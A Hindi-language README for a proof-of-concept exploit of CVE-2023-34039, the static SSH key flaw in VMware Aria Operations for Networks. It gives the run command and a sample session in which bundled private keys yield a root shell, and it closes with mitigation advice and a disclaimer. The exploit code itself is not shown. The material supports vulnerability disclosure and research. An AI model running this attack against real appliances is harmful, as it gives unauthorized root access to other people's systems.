
VMware एक्सप्लॉइट
POC for CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE
इस कमजोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

VMWare Aria Operations for Networks (vRealize Network Insight) संस्करण 6.0 से 6.10 तक ने support और ubuntu उपयोगकर्ताओं के लिए ssh कुंजियों को पुनर्जीवित नहीं किया, जिससे SSH पहुंच वाले हमलावर को इस उत्पाद पर root शेल पहुंच प्राप्त करने की अनुमति मिली।
यह समस्या VMWare को Harsh Jaiswal (@rootxharsh) और Rahul Maini (@iamnoooob) द्वारा ProjectDiscovery Research में रिपोर्ट की गई थी।
मैंने बस एक्सप्लॉइट लिखा है, अगर आप इसे ऐसा कह सकते हैं, क्योंकि यह मूलतः एक ssh कमांड रैपर है।
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~#
नवीनतम संस्करण में अपडेट करें या Progress Advisory में दिए गए निर्देशों का पालन करके शमन करें।
यह सॉफ्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।